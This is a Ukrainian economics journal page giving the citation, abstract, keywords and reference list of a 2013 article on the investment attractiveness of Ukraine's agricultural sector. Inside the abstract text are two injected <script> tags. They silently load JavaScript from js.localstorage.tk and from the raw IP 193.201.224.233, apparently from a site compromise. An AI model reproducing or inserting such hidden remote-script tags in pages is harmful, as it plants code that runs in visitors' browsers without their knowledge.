ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.162:657.62
Фінансові відносини та бухгалтерський облік

Інвестиційна привабливість аграрного сектору України: стан та шляхи активізації / Резнік Н. П. // Економіка АПК. - 2013. - № 11 - С. 67

Аналізується інвестиційний клімат в Україні та його особливості на сучасному етапі розвитку. Виявлено основні причини погіршення інвестиційного середовища, пов’язані зі змінами ринкової кон’юнктури і обмеженістю інвестиційних ресурсів, а також пропонуються шляхи його вдосконалення. Обґрунтовано умови розширення потенційних джерел інвестицій. В роботі розглянуто основні положення щодо місця України в міжнародних рейтингових оцінках, інвестиційної привабливості підприємств для іноземного інвестора та напрями її підвищення. Викладено результати аналізу рейтингу України на міжнародному ринку інвестицій. Здійснено спробу охарактеризувати показники, що визначають резерви та ступінь їх впливу на інвестиційну привабливість підприємства, що дозволить визначити загальні наслідки при використанні потенціалу кожного з показників. За результатами такого аналізу можна буде виділити напрями підвищення інвестиційної привабливості підприємства, згідно зі ступенем впливу кожного чинника на її загальний рівень. Рис.: 2. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інвестиційна привабливість, інвестиції, інвестиційний клімат України, інвестиційне середовище, міжнародний рейтинг

Список використаних джерел

  1. World investment report 2010: Investing in a low-carbon economy. – New York – Geneva : UNCTAD, 2010. – 220 p. – Ref. after chapts.
  2. Finance.ua. Analytics [Electronic Resource] – Mode of access: http://news.finance.ua/ru/~/1/0/all/2010/06/15/ 200503.
  3. Global Investment Promotion benchmarking 2009 [Electronic resource] // International Financial Corporation. The World Bank Group. – Mode of access : http://www.ifc.org// /GIPB2009.SummaryReport.pdf.
  4. Statistical information [Electronic Resource] // State Statistics Committee of Ukraine. – Mode of access: http://www.ukrstat.gov.ua.
  5. The Global competitiveness Report 2010–2011 [Electronic resource] // World Economic Forum. – Mode of access: http://www.weforum.org/ en/initiatives/gcp/Global%20Competitiveness%20Report/index.htm.
  6. Corrado Charles J., Brandord P.J. Fundamentals of investments: valuation and management. – Boston: Irwin, McGraw-Hill, 2000. – XXIV, 594 p.
  7. Sones Sally M. Principles of taxation for business and investment planning. – Boston: Irwin, McGraw-Hill, 1998. – XXIV, 477 p.
  8. Zvi Bodie, Alex Kane, Alan J. Marcus. Essentials of investment. – Boston: Irwin, McGraw-Hill, 1998. – XXIV, 612 p.
  9. Agrarian reform is in Ukraine / [Gayduckiy P. I., Sabluk P. T., Lupenko Yu. O. but other]; for editor P. I. Gayduckogo. – K. : NNC IAE, 2005. – 424 p.
  10. Geec V. M. Society, state, economy: fenomenologia of co-operation and development / V. M. Geec; NAN of Ukraine; Institute of economy and prognostication of NAN of Ukraine. – K., 2009 – 864 p.
Читати статтю: 13_11_67-72.pdf